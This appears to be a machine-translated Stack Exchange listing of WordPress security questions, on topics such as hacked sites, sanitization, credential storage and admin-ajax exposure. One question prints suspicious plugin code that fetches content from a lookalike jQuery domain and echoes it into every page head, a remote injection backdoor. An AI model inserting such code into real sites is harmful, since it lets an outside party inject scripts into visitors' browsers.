Questions tagged «security»

关闭。这个问题是题外话。它当前不接受答案。 想改善这个问题吗？ 更新问题，使它成为WordPress Development Stack Exchange 的主题。 4年前关闭。 我安装了插件Simple Login Lockdown，从几天前开始，该数据库每天记录的记录超过200条。 我认为不可能让我的网站受到这么多IP的攻击 您认为有什么问题吗？

20 login  security 

我有一个最近被黑客入侵的客户，我注意到她的网站上出现了奇怪的字符，例如Â和Æ。事实证明，黑客wp_options在数据库表中将blog_charset更改为UTF-7 。我将其设置为UTF-8，但我想知道在设置为UTF-7的期间是否会产生任何安全漏洞？ 我进行了一些搜索，发现曾经有一个WordPress UTF-7漏洞已在2.0.6版中修复。我们正在运行最新版本的WordPress，因此他们无法使用该漏洞利用程序，但是还有其他与UTF-7相关的漏洞利用程序吗？真的，除了痛苦之外，黑客还有什么理由会改变blog_charset吗？我一直在尝试确定他们是如何进入的，我想知道这是否以某种方式连接。

19 security  encoding  hacked  characters 

我是WordPress的新手。我最近阅读了一篇有关黑客如何利用插件漏洞的文章。诸如Google Pagespeed之类的各种来源也使我无法使用插件，或者至少将其保持在最低水平。就我个人而言，我也尽量避免使用插件，因为我可以更好地控制网站上发生的事情，并且下载插件几乎感觉像“很棒，我必须学习如何使用另一件事”。 我知道“插件推荐”是题外话，但我要讲的实际上是解释为什么/如果某些插件在WordPress中必不可少。 以这些为例： 安全性 -一些顶级插件与安全性有关。但是WordPress网站通常容易受到攻击吗？为什么我需要一个额外的插件来避免被利用？ 备份 -我是博客世界的新手，但是大多数托管人不提供备份服务吗？还是我需要使用WordPress的专用插件？ AdSense Click-Fraud监控 -旨在阻止Click炸弹以避免被Google放逐。但是我不明白，除非您下载插件，否则所有人都必须做几次虚假点击才能关闭您的收入吗？ 编辑：最好在Google支持中询问此问题，如果这样则忽略它

19 plugins  security 

我目前正在开发一个插件，很可能我会在公共插件存储库中发布它，以便其他人可以使用它。 该插件将使用API​​，并且要使用此API，您需要传递用户名和密码。因此，我的插件需要将这些登录凭据存储在数据库中。尽管API需要使用纯文本格式，但我不想将它们存储为纯文本格式。 所以我的问题是如何存储这些敏感信息？散列不存在，因此必须进行某种加密。 在WordPress中，有一个可以使用的唯一密钥，该密钥因博客而异？我应该使用哪些PHP函数进行加密和解密？我正在寻找可以在所有WP安装中正常工作的功能。

19 plugin-development  security  api  encryption 

我在插件中找到了这个。它有什么作用？危险吗？ add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

我想确保插件/主题中的所有数据在进入数据库之前以及输出到浏览器之前都得到安全处理。我的问题是，在某些情况下，API会为您处理清理操作（例如，保存帖子元字段时），而在某些情况下，插件/主题作者将全权负责清理操作（例如，保存自定义设置时）。 对于此问题的范围，我不关心在域级别验证数据-例如，检查表单上的Age字段是否在0到120之间，或电子邮件地址是否有效。我只关心安全性-例如，转义SQL查询以避免在保存到数据库时进行SQL注入，或者清除输出到HTML模板的数据以避免XSS。 为了进行输出清理，我知道在将变量回显到HTML模板中时，您总是需要使用esc_html()和之类的函数esc_attr()。但是，使用模板标签时呢？他们都已经清理输出了吗？如果是这样，则针对哪个上下文（常规HTML，标记属性等）？某些函数具有针对不同上下文的变体（例如the_title_attribute()，但大多数没有）。 为了进行输入清理，我知道$wpdb->prepare()在进行手动查询时需要使用，但是在使用Settings API创建插件设置页面或为自定义帖子类型保存帖子元字段时该怎么办？ 现在，每当我使用一个函数来查找它是否可以清除时，我就一直在深入研究Core并阅读教程，但这很容易出错并且很耗时。我希望找到所有可能情况以及API是否处理的全面列表。例如， API验证/清除 使用 update_postmeta() 保存用户元 update_user_meta() 输出帖子标题-使用上下文相关的变体 the_title() 等等 您必须手动验证/消毒 使用Settings API保存插件选项。将回调作为的第3个参数传递register_setting()。 直接数据库查询：将查询包装在中$wpdb->prepare()。 以HTML输出变量。使用esc_attr()，esc_html()等 等等 我也很想了解为什么在某些情况下API提供了它，而在其他情况下却没有。我假设它与数据的未知性质有关，但希望听到一个详尽的解释。

17 plugin-development  security  customization  validation  sanitization 

在较新版本的wordpress上是否存在保留wp-admin/install.php和wp-admin/install-helper.php安全漏洞？默认情况下，这些文件的文件许可权是644。 如果有泄漏，请什么样？

16 security  installation 

按照目前的情况，这个问题并不适合我们的问答形式。我们希望答案得到事实，参考或专业知识的支持，但是这个问题可能会引起辩论，争论，民意调查或扩展讨论。如果您认为此问题可以解决并且可以重新提出，请访问帮助中心以获取指导。 7年前关闭。 作为想成为WP插件的开发人员，我应该寻找哪些主要的安全漏洞/漏洞？ 我将使用配置面板（即输入字段和内容）创建一个新插件。我应该担心什么？ 例如，由于数据清理在/ wp-admin /区域中是否重要？恶意者可以直接点击我的插件页面并发送POST请求或类似的内容吗？ 谢谢！

16 plugins  plugin-development  security  sql 

我看到默认情况下，在媒体上传器中SVG被阻止，您必须将其添加为functions.php中受支持的MIME类型。这背后的安全原因是什么？

15 media  security  svg 

我看过代码，但看不到任何类似功能的转义字符the_title the_content the_excerpt。我可能没有正确阅读。我是否需要在主题开发中转义这些功能，例如： esc_html ( the_title () ) 编辑：上面的代码下面的答案中指出，无论如何都是错误的-该代码应已阅读 esc_html ( get_the_title () )

15 security  escaping 

我们与外部开发人员遇到了一些问题。 我们希望将对wp-admin站点的访问限制为仅内部访问（通过VPN）。简单地说，它将不会受到外部用户的攻击。我们可以从站点枚举管理员，而不希望他们被网络钓鱼。 我们的开发人员说我们不能这样做，因为该站点需要使管理页面可以从外部访问，以便该页面正常运行。特别是admin-ajax页面。 该admin-ajax.php页面做什么？ 它位于WordPress的管理部分。最终用户是否未经身份验证访问了它？将其提供给外部用户是否不安全？

14 admin  ajax  security 

只是一个简单的问题，可能会对安全性有所帮助。我注意到readme.html文件列出了版本号。每次升级后，它会重新出现，licence.txt和wp-config-sample.php也是如此。 有没有一种简单的方法可以让WordPress在升级后自动删除这些文件？ 我已经阻止了版本号显示在meta标签，rss feed，atom等中。 我知道这种类型的安全性并没有那么大的帮助，但只是认为这可能只是一个很小的开始。听说人们可以简单地检查WP-includes中包含的jQuery版本，并交叉引用WP随附的版本。

13 security  wp-config 

配置WordPress以在应用程序（即WordPress）中更新对我来说非常理想，因为它很方便。但是，我对要求感到困扰。在为PHP安装ssh2之后显示的请求字段不仅问我的公钥，还问我的私钥。我认为最多只需要公用密钥。 WordPress实际上是否将我的私钥提供给服务器，以便该服务器可以将正确的软件包上传到我的服务器？我熟悉SSH私钥/公钥的工作方式，这就是为什么我困惑WordPress为什么需要这样做的原因。如果有的话，我认为更新机制甚至不需要此协议。它只会使用http或ftp到软件包服务器，然后从那里下载/安装/激活。 WordPress为什么需要我的ssh密钥？这里有安全问题吗？

13 security  updates  ssh 

查看wp_insert_post（）的Codex，它指出该函数“ ...清理变量，进行一些检查，填写缺少的变量，如日期/时间等。”（编辑：我更新了Codex条目以包含一个更强大的示例其中包括安全性以及发布元和类别分配） 只是想知道我是否需要进行进一步的清理以防止XSS骇客之类的东西，或者是否通过该功能做了足够的工作。 老实说，我检查了核心函数，例如在post_content上未找到任何wp_kses（）或其他清理方法，因此我有点担心。我所看到的只是数据上的stripslashes_deep（）。 因此，当我为wp_insert_post（）构建参数时，我应该运行wp_kses（）还是其他任何东西？ 最佳做法是什么？在其示例中，食品法典委员会对安全性相当谨慎。 谢谢

13 security  sanitization 

这件事使我的编码变得困难。Wordpress Codex通过模糊地谈论安全性来说明使用esc_url的原因。但这真的值得麻烦吗？ 例如，使用 <?php echo esc_url( home_url( '/' ) ); ?> 代替 <?php echo home_url() ?> PS：我不是在谈论主题开发，而是在谈论特定站点。

12 security